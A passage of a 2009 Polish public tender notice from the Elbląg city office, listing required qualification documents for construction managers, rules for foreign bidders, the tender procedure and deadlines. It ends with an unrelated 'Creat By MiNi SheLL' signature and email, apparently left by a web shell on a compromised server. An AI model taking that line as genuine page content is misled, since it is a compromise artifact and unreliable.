a)	 Dla osób wymienionych w wykazie osób, o którym mowa w pkt VI. ppkt 1.5. SIWZ, należy złożyć z ofertą dokumenty: decyzję o nadaniu wymaganych uprawnień budowlanych oraz aktualne zaświadczenie o przynależności kierownika budowy, kierownika robót ogólnobudowlanych i kierowników robót branżowych tj. kierownika robót elektrycznych, kierownika robót sanitarnych, do właściwej izby samorządu zawodowego.
       Dla kierownika robót ogólnobudowlanych należy złożyć dodatkowo dokumenty potwierdzające odbycie 2- letniej praktyki przy zabytkach nieruchomych.
       Dla osób będących obywatelami państw członkowskich UE, którzy nabyli kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej zgodnie z ustawą z dnia 18.03.2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63, poz. 394) odpowiednią decyzję o uznaniu kwalifikacji zawodowych oraz zaświadczenie o wpisie do właściwej izby samorządu zawodowego.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymienione dokumenty Wykonawcy składają wspólnie.

Dokumenty należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
UWAGA:

1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, 
    zamiast dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ składa dokument lub dokumenty   
    wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
1)  nie otwarto jego likwidacji ani nie ogłoszono upadłości;
	
	Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
	
2.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce 
zamieszkania nie wydaje się dokumentów, o których mowa w pkt 1. UWAGI zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3.	Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125 
82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2009 godzina 09:30, miejsce: Urząd Miejski w Elblągu Wydział Zamówień Publicznych
                 82-300 Elbląg,  ul. Łączności 1, pokój nr 125.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Dotyczy Sekcji II.2) ogłoszenia CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA
               data rozpoczęcia:        data udzielenia zamówienia	
         data zakończenia I etapu:	      15 listopada 2009 r.
         data zakończenia II etapu:	      30 czerwca 2010 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com